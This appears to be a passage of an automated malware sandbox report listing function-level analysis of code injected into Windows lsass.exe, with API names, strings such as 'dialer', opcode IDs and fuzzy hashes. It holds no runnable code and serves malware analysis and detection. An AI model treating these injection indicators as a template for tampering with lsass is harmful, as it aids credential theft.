                                                                                                                            • Opcode Fuzzy Hash: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                                                                                            • Instruction Fuzzy Hash: 2D210CB6628A44C7EB108B25F44C75967A1F789BE4F504216EA5E06EA8DF7CC949CB00
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001B.00000002.3331439695.000002D6F1510000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_27_2_2d6f1510000_lsass.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                            • String ID: csm$csm$csm
                                                                                                                            • API String ID: 849930591-393685449
                                                                                                                            • Opcode ID: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                                                                                            • Instruction ID: c723f1f196541d97861d438692a693aba2ea927f234d4d4577a4b0ac93f6314a
                                                                                                                            • Opcode Fuzzy Hash: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                                                                                            • Instruction Fuzzy Hash: C6E15DB6604B808AEB629FA5E44C39D77A0F745BD8F100517EE8E67F99CB38D991C700
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001B.00000002.3331708913.000002D6F1570000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1570000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_27_2_2d6f1570000_lsass.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                            • String ID: csm$csm$csm
                                                                                                                            • API String ID: 849930591-393685449
                                                                                                                            • Opcode ID: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                                                                                            • Instruction ID: 0f6e5b8044e5d079d439375bd99d2ce9799423058a62ca4ea6fc09f96229a622
                                                                                                                            • Opcode Fuzzy Hash: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                                                                                            • Instruction Fuzzy Hash: DAE16DB2604B488AEB609FA5E44E39D77A0F745BD8F148117EE8E57F99CB38C991C700
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001B.00000002.3331385456.000002D6F14E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F14E0000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_27_2_2d6f14e0000_lsass.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                            • String ID: csm$csm$csm
                                                                                                                            • API String ID: 849930591-393685449
                                                                                                                            • Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                                                                                            • Instruction ID: d823906c8357baff7e49bf9f9c1525c5136429e0f71f4035b6608ff5472b74b6
                                                                                                                            • Opcode Fuzzy Hash: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                                                                                            • Instruction Fuzzy Hash: 11E16C72604B808EEB60DF65E49C39D77A0F795BD8F100516EE8A97F99CB38CA91C700
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001B.00000002.3331439695.000002D6F1510000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_27_2_2d6f1510000_lsass.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressFreeLibraryProc
                                                                                                                            • String ID: api-ms-$ext-ms-
                                                                                                                            • API String ID: 3013587201-537541572
                                                                                                                            • Opcode ID: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                                                                                            • Instruction ID: 261ecf9bf2a1f0678fa278aa22b30c90f33c111913abcd05092592ff9b1f8fec
                                                                                                                            • Opcode Fuzzy Hash: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                                                                                            • Instruction Fuzzy Hash: B44192A2311E409AEA1BCF26B84C7566395B749BE0F5941279D1FA7F84EE3CCC498350
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001B.00000002.3331708913.000002D6F1570000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1570000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_27_2_2d6f1570000_lsass.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressFreeLibraryProc
                                                                                                                            • String ID: api-ms-$ext-ms-
                                                                                                                            • API String ID: 3013587201-537541572
                                                                                                                            • Opcode ID: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                                                                                            • Instruction ID: af9aaba1a7632fb24a63686b5a71bcd91d3a68279784362639626bcb4f06b3ab
                                                                                                                            • Opcode Fuzzy Hash: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                                                                                            • Instruction Fuzzy Hash: 8F41B2A2325E149BEB1ACB16B90D7566392B745BE0F5981279D2F87F84EE3CCC458310
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001B.00000002.3331439695.000002D6F1510000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_27_2_2d6f1510000_lsass.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                                                                                            • String ID: d
                                                                                                                            • API String ID: 3743429067-2564639436
                                                                                                                            • Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                                                                            • Instruction ID: 7c308a324f3a3b915ae5c740d95f6965976605312a1237647059209b5cbc419f
                                                                                                                            • Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                                                                            • Instruction Fuzzy Hash: AC413D73614F84CAEB61CF21E44879AB7A1F388B98F54811ADA8A17B58DF3CD945CB40
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001B.00000002.3331708913.000002D6F1570000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1570000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_27_2_2d6f1570000_lsass.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                                                                                            • String ID: d
                                                                                                                            • API String ID: 3743429067-2564639436
                                                                                                                            • Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                                                                            • Instruction ID: 1d423567965e06e969093779b1307c016526d9577681494677f4e632e54e6819
                                                                                                                            • Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                                                                            • Instruction Fuzzy Hash: C8413E72214F84CAEB60CF21F45979A77A1F388B98F448116DA8A0BB58DF3CC945CB40
                                                                                                                            APIs
                                                                                                                            • FlsGetValue.KERNEL32(?,?,?,000002D6F151C7DE,?,?,?,?,?,?,?,?,000002D6F151CF9D,?,?,00000001), ref: 000002D6F151D087
                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,000002D6F151C7DE,?,?,?,?,?,?,?,?,000002D6F151CF9D,?,?,00000001), ref: 000002D6F151D0A6
                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,000002D6F151C7DE,?,?,?,?,?,?,?,?,000002D6F151CF9D,?,?,00000001), ref: 000002D6F151D0CE
                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,000002D6F151C7DE,?,?,?,?,?,?,?,?,000002D6F151CF9D,?,?,00000001), ref: 000002D6F151D0DF
                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,000002D6F151C7DE,?,?,?,?,?,?,?,?,000002D6F151CF9D,?,?,00000001), ref: 000002D6F151D0F0
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001B.00000002.3331439695.000002D6F1510000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_27_2_2d6f1510000_lsass.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Value
                                                                                                                            • String ID: 1%$Y%
                                                                                                                            • API String ID: 3702945584-1395475152
                                                                                                                            • Opcode ID: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                                                                                            • Instruction ID: 2480a359072ec50eb541e18d4b91d9545f280b7cfca78c1f54feae84ed9f0741
                                                                                                                            • Opcode Fuzzy Hash: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                                                                                            • Instruction Fuzzy Hash: A61103E0705E444AFA6A5F36755E36962429B447F0F144727983F67EDAEE2CDC428600
                                                                                                                            APIs
                                                                                                                            • FlsGetValue.KERNEL32(?,?,?,000002D6F157C7DE,?,?,?,?,?,?,?,?,000002D6F157CF9D,?,?,00000001), ref: 000002D6F157D087
                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,000002D6F157C7DE,?,?,?,?,?,?,?,?,000002D6F157CF9D,?,?,00000001), ref: 000002D6F157D0A6
                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,000002D6F157C7DE,?,?,?,?,?,?,?,?,000002D6F157CF9D,?,?,00000001), ref: 000002D6F157D0CE
                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,000002D6F157C7DE,?,?,?,?,?,?,?,?,000002D6F157CF9D,?,?,00000001), ref: 000002D6F157D0DF
                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,000002D6F157C7DE,?,?,?,?,?,?,?,?,000002D6F157CF9D,?,?,00000001), ref: 000002D6F157D0F0
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001B.00000002.3331708913.000002D6F1570000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1570000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_27_2_2d6f1570000_lsass.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Value
                                                                                                                            • String ID: 1%$Y%
                                                                                                                            • API String ID: 3702945584-1395475152
                                                                                                                            • Opcode ID: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                                                                                            • Instruction ID: 1dadfff657a4208375519c7d841b61a8a2fc131f9ffb33344b07e82d8974b2af
                                                                                                                            • Opcode Fuzzy Hash: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                                                                                            • Instruction Fuzzy Hash: FB1163E0704E4C49FA699736755F37961415B447F0F54D327A83F06EDAEE2DCC028600
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001B.00000002.3331439695.000002D6F1510000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_27_2_2d6f1510000_lsass.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 190073905-0
                                                                                                                            • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                                                                            • Instruction ID: 9e9a13fecbd3ee6dd4b9af7d8544c3df26673650e91134e0a1763e142b039acf
                                                                                                                            • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                                                                            • Instruction Fuzzy Hash: 8A81B0E1600E418EFB56AF6DB84D3992691A7857C0F544827AA0F67F97EB7CCC468700
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001B.00000002.3331708913.000002D6F1570000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1570000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_27_2_2d6f1570000_lsass.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 190073905-0
                                                                                                                            • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                                                                            • Instruction ID: ce5925644fadde1b738ab39b843e9ca717b849bd89ccf09029adfe775e7cf4c8
                                                                                                                            • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                                                                            • Instruction Fuzzy Hash: 1881CFE1610F498EFB50AB69B44F3A96291A7857D0F54C4279E0F47F9AEB7CCC458700
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001B.00000002.3331439695.000002D6F1510000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_27_2_2d6f1510000_lsass.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                            • String ID: api-ms-
                                                                                                                            • API String ID: 2559590344-2084034818
                                                                                                                            • Opcode ID: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                                                                                            • Instruction ID: 1b9a7946070453fa793877a5e81080cf6b3e7f40ad096b1fe8965e9392f62bd4
                                                                                                                            • Opcode Fuzzy Hash: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                                                                                            • Instruction Fuzzy Hash: E331A3A2212E40EDEE17DF42F41C7552294B748BE4F590A269D2F1BB94EF3DC8858310
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001B.00000002.3331708913.000002D6F1570000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1570000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_27_2_2d6f1570000_lsass.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                            • String ID: api-ms-
                                                                                                                            • API String ID: 2559590344-2084034818
                                                                                                                            • Opcode ID: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                                                                                            • Instruction ID: 5c6e5a0988f284c355c25f9168c8e8ac80771c20c2383100d83637de9ef712f0
                                                                                                                            • Opcode Fuzzy Hash: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                                                                                            • Instruction Fuzzy Hash: A031C2A1212E45EDEF52DB02B81D7652294B748BF0F598A279D2F4BB91EF3DC8458320
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001B.00000002.3331439695.000002D6F1510000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_27_2_2d6f1510000_lsass.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                            • String ID: CONOUT$
                                                                                                                            • API String ID: 3230265001-3130406586
                                                                                                                            • Opcode ID: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                                                                                            • Instruction ID: f7805de5885bb23c4ed2acbf2a3bac675694138274e2d29da4d1e0af9514ac00
                                                                                                                            • Opcode Fuzzy Hash: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                                                                                            • Instruction Fuzzy Hash: D8112BA2210FC08AE7908B56F85D71966A0F788FE4F144226EE5F87B94DB7CC9158744
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001B.00000002.3331708913.000002D6F1570000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1570000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_27_2_2d6f1570000_lsass.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                            • String ID: CONOUT$
                                                                                                                            • API String ID: 3230265001-3130406586
                                                                                                                            • Opcode ID: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                                                                                            • Instruction ID: ef32201bed05ea217f9e0437352787023a37fc37bf18c82b79ad9f0e35032b0e
                                                                                                                            • Opcode Fuzzy Hash: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                                                                                            • Instruction Fuzzy Hash: 93115BA1228F408BE7908B52F89C31966A0F788FF4F584226EA5F87B95CB3CC8148744
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001B.00000002.3331439695.000002D6F1510000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_27_2_2d6f1510000_lsass.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CurrentProcessProtectVirtual$HandleModule
                                                                                                                            • String ID: wr
                                                                                                                            • API String ID: 1092925422-2678910430
                                                                                                                            • Opcode ID: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                                                                                            • Instruction ID: 56a1fc91981ff5b9860e83c331195b973d21dc503a25c2b603b9cee17e6af388
                                                                                                                            • Opcode Fuzzy Hash: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                                                                                            • Instruction Fuzzy Hash: FD1157AA705B81CAEF559F21F41C66962B0FB88BD5F44042ADE8E07B94EF3DCA05C704
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001B.00000002.3331708913.000002D6F1570000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1570000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_27_2_2d6f1570000_lsass.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CurrentProcessProtectVirtual$HandleModule
                                                                                                                            • String ID: wr
                                                                                                                            • API String ID: 1092925422-2678910430
                                                                                                                            • Opcode ID: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                                                                                            • Instruction ID: 4f6c9b040aad189fd952b8a9b6a6164ecf5b220afb35263a75ed92d83168b344
                                                                                                                            • Opcode Fuzzy Hash: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                                                                                            • Instruction Fuzzy Hash: DB118BAA315B44CBEF549B21F40C269A6B0FB88BE5F04412ADE8E07B94EF3DC905C704
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001B.00000002.3331439695.000002D6F1510000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_27_2_2d6f1510000_lsass.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Thread$Current$Context
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1666949209-0
                                                                                                                            • Opcode ID: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                                                                                                                            • Instruction ID: 48f46886f9a4c9f0af87d4b559936913019cc1f1eed6d2fcc966534f28762692
                                                                                                                            • Opcode Fuzzy Hash: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                                                                                                                            • Instruction Fuzzy Hash: 76D187B6214F8889DA719F1AF49835A77A0F389BC4F104216EA8E57BA5DF7CC941CF40
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001B.00000002.3331708913.000002D6F1570000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1570000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_27_2_2d6f1570000_lsass.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Thread$Current$Context
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1666949209-0
                                                                                                                            • Opcode ID: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                                                                                                                            • Instruction ID: e5760c3603de52599fe3a25d6f3076f3f779b908cb67f5cb94bbf46be29a7f16
                                                                                                                            • Opcode Fuzzy Hash: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                                                                                                                            • Instruction Fuzzy Hash: 14D19AB6214F9889DA709B06F49935A77A0F388BD4F504117EA8E47BA9DF7CC941CF40
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001B.00000002.3331439695.000002D6F1510000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_27_2_2d6f1510000_lsass.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Heap$Process$AllocFree
                                                                                                                            • String ID: dialer
                                                                                                                            • API String ID: 756756679-3528709123
                                                                                                                            • Opcode ID: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                                                                                            • Instruction ID: 6f7c6b014d4bd7126e3bbbff313cacc6244a2be32cd63f79b011c0dee58239f0
                                                                                                                            • Opcode Fuzzy Hash: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                                                                                            • Instruction Fuzzy Hash: F631CDA2301F918AEB56CF16F54C72A67A0FB44BC0F1880269E4E57F55EF3CD8A18300
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001B.00000002.3331708913.000002D6F1570000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1570000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_27_2_2d6f1570000_lsass.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Heap$Process$AllocFree
                                                                                                                            • String ID: dialer
                                                                                                                            • API String ID: 756756679-3528709123
                                                                                                                            • Opcode ID: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                                                                                            • Instruction ID: a0743bfa3e9f58e70318fe82f3fb098ba7e3a8dd59aa07676ac2cad6ad1ec82b
                                                                                                                            • Opcode Fuzzy Hash: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                                                                                            • Instruction Fuzzy Hash: 613189A2711F598AEB55CF16F54E72A67A0FB44BD0F0880279E4E47F56EB3CC8A18300
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001B.00000002.3331439695.000002D6F1510000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_27_2_2d6f1510000_lsass.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Heap$Process$Free
                                                                                                                            • String ID: C:\Windows\system32\lsass.exe
                                                                                                                            • API String ID: 3168794593-3553486595
                                                                                                                            • Opcode ID: 335002606d0c58216c4b7b8c214cf2e956f7ef49abbb5e195d674a66fc258290
                                                                                                                            • Instruction ID: 4c3fb5dbda590ede340f70e239d951b1946e93fc28bd49ed613bd9f4bb13803d
                                                                                                                            • Opcode Fuzzy Hash: 335002606d0c58216c4b7b8c214cf2e956f7ef49abbb5e195d674a66fc258290
                                                                                                                            • Instruction Fuzzy Hash: 77219EEB509ED08EF651DF25B89D29D27A0F749BC4F194017DF4E93A43DA2DAC048700
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001B.00000002.3331439695.000002D6F1510000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_27_2_2d6f1510000_lsass.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Value$ErrorLast
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2506987500-0
                                                                                                                            • Opcode ID: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                                                                                            • Instruction ID: 64ae360e53322a3fe6ae1786423e02a03aa622958712b9455162e794dcab319a
                                                                                                                            • Opcode Fuzzy Hash: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                                                                                            • Instruction Fuzzy Hash: 931157E0301E804AFA6A9F35765D73952529B447F0F144717983F67FD6DE6DCC428600
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001B.00000002.3331708913.000002D6F1570000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1570000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_27_2_2d6f1570000_lsass.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Value$ErrorLast
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2506987500-0
                                                                                                                            • Opcode ID: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                                                                                            • Instruction ID: a6b213a5400f60c42383ff69cc1183cbdc54369affa2b4c1a008411f74401b9b
                                                                                                                            • Opcode Fuzzy Hash: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                                                                                            • Instruction Fuzzy Hash: 781184E0304E884AFA699732B55F73961426B457F0F149727A83F47FDAEE2CCC018200
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001B.00000002.3331439695.000002D6F1510000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_27_2_2d6f1510000_lsass.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 517849248-0
                                                                                                                            • Opcode ID: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                                                                                            • Instruction ID: cff459d1bd899cdfd44676a5a381a09abba527aeb6cc39614b6ef60cc1fcaaaf
                                                                                                                            • Opcode Fuzzy Hash: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                                                                                            • Instruction Fuzzy Hash: 070129B2300E808AEB54DB62B89C75967A5F788BC4F984036DE4E53B55DF3CC989C740
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001B.00000002.3331708913.000002D6F1570000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1570000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_27_2_2d6f1570000_lsass.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 517849248-0
                                                                                                                            • Opcode ID: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                                                                                            • Instruction ID: 30fae6d9d6e726df8e09fc2420a2e646efaa82e0fd841fdca9295a1705f58575
                                                                                                                            • Opcode Fuzzy Hash: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                                                                                            • Instruction Fuzzy Hash: 210157A1314E448AEB10DB52B88C75963A1F788BD0F888036DE4E47B55DF3CC989C740
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001B.00000002.3331439695.000002D6F1510000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
